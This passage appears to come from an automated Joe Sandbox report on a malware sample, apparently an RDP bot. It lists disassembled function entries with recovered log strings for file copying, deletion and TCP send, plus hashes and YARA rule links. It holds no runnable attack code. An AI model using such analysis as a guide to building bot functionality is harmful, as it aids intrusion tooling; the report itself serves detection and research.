                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
                    • API String ID: 2918714741-1951032453
                    • Opcode ID: a5ca9b0bf9b3be9852da4ba323c51029fd9cf6fcbeba48dbf9b72e0c84d279d6
                    • Instruction ID: e21125e88ac6f15d7a7162140a449020367fbe9ab2483713d00ba015a0b2b830
                    • Opcode Fuzzy Hash: a5ca9b0bf9b3be9852da4ba323c51029fd9cf6fcbeba48dbf9b72e0c84d279d6
                    • Instruction Fuzzy Hash: 26219266A0964792E7119F99E840BAA7760BB847D4F448032EF4C47BA6DF3CE845C700
                    Function 00007FF8BFB8C900 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: _errno
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                    • API String ID: 2918714741-719680006
                    • Opcode ID: a242bb18889e0c0625166b0c1d0e8931bd7771407aa4d943679f1e3ef64d3bc1
                    • Instruction ID: 81e7acbe6276570ffdadcceb78e253ecb891e58cf5bb9b1173ad15bdb73e6d96
                    • Opcode Fuzzy Hash: a242bb18889e0c0625166b0c1d0e8931bd7771407aa4d943679f1e3ef64d3bc1
                    • Instruction Fuzzy Hash: 4B2192A2A0968696E7519FADFC407AA3360FB847D4F848032EF4C47A95DF3DE885C700
                    Function 00007FF7088730B1 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 123fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: CopyErrorFileLastfflushfwrite
                    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
                    • API String ID: 2887799713-3464183404
                    • Opcode ID: e0801e7690222cc35289c1b93414f4e860f672ed9cdf723d85d364122bdd9ec2
                    • Instruction ID: 15a5b440f223f9f7a0f8f5d4e1c0e1a062501792a50cea36b0253be610a86884
                    • Opcode Fuzzy Hash: e0801e7690222cc35289c1b93414f4e860f672ed9cdf723d85d364122bdd9ec2
                    • Instruction Fuzzy Hash: 97419291E7C61781FA20FA459C00B79E6607F00B89FD44432D90E467E0EF6DE6E1E32A
                    Function 00007FF708872AE5 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: DeleteErrorFileLast
                    • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                    • API String ID: 2018770650-4119452840
                    • Opcode ID: 09e8feae0f86e5f08bdf1165c431ff31ac24ab6767de1c26253ba0b688ab206d
                    • Instruction ID: fb5ac61f12049688786605316fcfaecca83584819268776ab4e98f00e6e456a7
                    • Opcode Fuzzy Hash: 09e8feae0f86e5f08bdf1165c431ff31ac24ab6767de1c26253ba0b688ab206d
                    • Instruction Fuzzy Hash: 23312C51F2C206C2FA60FB08AC54FB9E1609F50794FA44832CA1F472D1AF1CE8E5932A
                    Function 00007FF8BFB8219D Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 66networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsend
                    • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                    • API String ID: 1802528911-690514478
                    • Opcode ID: e8ba87babdc92bbe2a7f32843d88da73179fa1b60c34bd879e4ec4185fda7202
                    • Instruction ID: d54c172bcc8366aaa6b0cd1f63937d0d8bcf20c985ed33fb8fe988ef89450408
                    • Opcode Fuzzy Hash: e8ba87babdc92bbe2a7f32843d88da73179fa1b60c34bd879e4ec4185fda7202
                    • Instruction Fuzzy Hash: 9F21AE61B1854381EA206FEDB980AF86781AF967F4F549331DF3C87AE6DE2DA545C300
                    Function 00007FF8BFAB1CBD Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 66networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsend
                    • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                    • API String ID: 1802528911-690514478
                    • Opcode ID: 393cc4d55ed95309d327a289b224e54295f4c57547dcd5b235bd5891c8381aac
                    • Instruction ID: 128cff68bfc942b3a57d822e3cbb91adaf8104362f16a1dd2e628078fdaa8a9b
                    • Opcode Fuzzy Hash: 393cc4d55ed95309d327a289b224e54295f4c57547dcd5b235bd5891c8381aac
                    • Instruction Fuzzy Hash: 1221D151B0891245FA284FADAD426B45B51AF057FCF546331DFBC9A6E2DE2CA8498300
                    Function 00007FF8BFB52294 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                    • API String ID: 1729277954-887953274
                    • Opcode ID: bb776e6ec1625de7b5e10f3268d44c0e9dc8f51f6ab7e4191ff7ab127f8cc73c
                    • Instruction ID: 7cf72b812e1feb1f079a4c886e2a667ce9ff092629a9dbf0a4f1cfb7c8caca71
                    • Opcode Fuzzy Hash: bb776e6ec1625de7b5e10f3268d44c0e9dc8f51f6ab7e4191ff7ab127f8cc73c
                    • Instruction Fuzzy Hash: 35118271A0958296F720AB9DE84006AB760FF987D4F504235EB6D83FE4DF7CE5498B00
                    Function 00007FF8BFB81824 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                    • API String ID: 1729277954-887953274
                    • Opcode ID: a09ac9daefed23991da653184c4f8eb038bf2771e315a903420f93c20336098a
                    • Instruction ID: 7631d90fcac33f23cd3ebdb359f02effd0c428c7ab7b2395ecefb8411b1ac45d
                    • Opcode Fuzzy Hash: a09ac9daefed23991da653184c4f8eb038bf2771e315a903420f93c20336098a
                    • Instruction Fuzzy Hash: 6A113071A1854286E724AFADF8045B5A760FF887D4F108235EB6D837A5DF7CD509CB00
                    Function 00007FF8B9152154 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                    • API String ID: 1729277954-887953274
                    • Opcode ID: e3bf17d15134ec2d5b8b500cbb7a150eea8208203bd0f4f35b313d41db0cba31
                    • Instruction ID: 0722d53ca4698f41bb1f32d85a576daa88be57ee0f9b98ea681112667b733d14
                    • Opcode Fuzzy Hash: e3bf17d15134ec2d5b8b500cbb7a150eea8208203bd0f4f35b313d41db0cba31
                    • Instruction Fuzzy Hash: FF116071A086C386F7609F1DA840076AA61EF897D4F604232EB6E937E4DF7CE549DB00
                    Function 00007FF8BFAB1344 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                    • API String ID: 1729277954-887953274
                    • Opcode ID: 6327c41a263b5bd59de28098a4b2cc79f4f79abb1213812bc069fc7c46f51ebf
                    • Instruction ID: c73c510c01fa6896908e309f05f6a81dec94294a1b9b3e63e7b39f8b9cb4b151
                    • Opcode Fuzzy Hash: 6327c41a263b5bd59de28098a4b2cc79f4f79abb1213812bc069fc7c46f51ebf
                    • Instruction Fuzzy Hash: 0911E670A085424AF3649BAEE8011696760FF887C8F106235EB6D83BE5EF7CD54D8B00
                    Function 00007FF8BA502154 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                    • API String ID: 1729277954-887953274
                    • Opcode ID: f40d194872c8d45ecef68134c9250b96dff7f7ea37d8a0e4c201a4cf96a80767
                    • Instruction ID: 882c4a1239bd293b3a3b0140c111a1b068546f167f57a38e305101af8da6518e
                    • Opcode Fuzzy Hash: f40d194872c8d45ecef68134c9250b96dff7f7ea37d8a0e4c201a4cf96a80767
                    • Instruction Fuzzy Hash: 2711547160C54296E361AB9DAC4047A6660FB9A7D4F504272EF5E837B4DF7CD60E8B00
                    Function 00007FF8B9184CD4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: ErrorLastsetsockopt
                    • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                    • API String ID: 1729277954-887953274
                    • Opcode ID: 210327e81317c6c81d8a4d3a67e3bb1bf57ab15882df713e7d46baaea4ccbee5
                    • Instruction ID: d599f8b02d15c097c4edb2ea157ec6280bd39072c889911d061f5213395272f2
                    • Opcode Fuzzy Hash: 210327e81317c6c81d8a4d3a67e3bb1bf57ab15882df713e7d46baaea4ccbee5
                    • Instruction Fuzzy Hash: 8E116371A0858296E3209F2DE840565A660AF987D4F104335EB6D83AE5DF7CD507AB01
                    Function 00007FF8BFAB6230 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 62memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FF8BFAB631F
                    • routine_tx, xrefs: 00007FF8BFAB6318
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterHeapLeave$FreeProcess
                    • String ID: [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                    • API String ID: 2539320189-3555278722
                    • Opcode ID: a997a4d3c2cc867a1520977a3d56c0cbdd638971f55bc1ea485832968568b02c
                    • Instruction ID: 441a3a17dc87814d513e22bf71bcf59878ec2a93dbac6c242db2e2a9b9643ba7
                    • Opcode Fuzzy Hash: a997a4d3c2cc867a1520977a3d56c0cbdd638971f55bc1ea485832968568b02c
                    • Instruction Fuzzy Hash: BD311E35A08E428AEB288F99E841239B3A0FF44FC8F186035DB5E43B65DF3DE4458300
                    Function 00007FF8BFB87E69 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                    • API String ID: 1799206407-1112464793
                    • Opcode ID: 246f99be2f9a7613f0f970f80b26d1d377dd2a132c685df6de0c815cf2380339
                    • Instruction ID: f9da6b9d9c7af8cf84f521e8a18c8c8a8e9b3a49838fd0b9bd05707847679c76
                    • Opcode Fuzzy Hash: 246f99be2f9a7613f0f970f80b26d1d377dd2a132c685df6de0c815cf2380339
                    • Instruction Fuzzy Hash: 7421AF50E0C18382FB6446DDA48437C5388AF8039EF744572E74ECA6D6DE2DEEC6D252
                    Function 00007FF8BA5066C9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                    • API String ID: 1799206407-1112464793
                    • Opcode ID: 7c20dbad54cca28f09c7073d6860dd97cea1816a0499d71971a91a429b17aa21
                    • Instruction ID: 441eaf5faaf772590a9906eda99ced3d8a9f139d69dff6b6f406e5df5833e716
                    • Opcode Fuzzy Hash: 7c20dbad54cca28f09c7073d6860dd97cea1816a0499d71971a91a429b17aa21
                    • Instruction Fuzzy Hash: 48219B50E0C443C1FB744ADC9CE4379265A6F02399F6445B2DA4E8A9B0DEBDEF859602
                    Function 00007FF7088743A9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: AttributesErrorFileLast
                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                    • API String ID: 1799206407-1112464793
                    • Opcode ID: 7a405b16ffc5785a2b6771cb9200652e3960d591a1aa19c36c4854034cebdb89
                    • Instruction ID: 48ad3f8e2683c0d468ca4ebf2a391f1f31edddad11bb497a19f76ebd8c87cb75
                    • Opcode Fuzzy Hash: 7a405b16ffc5785a2b6771cb9200652e3960d591a1aa19c36c4854034cebdb89
                    • Instruction Fuzzy Hash: 9021B450E6D48382FB20F658AC44F7DD160AF00309FA45A32D25E8A5E1CF2CE8E5626E
                    Function 00007FF8BFB52B5A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
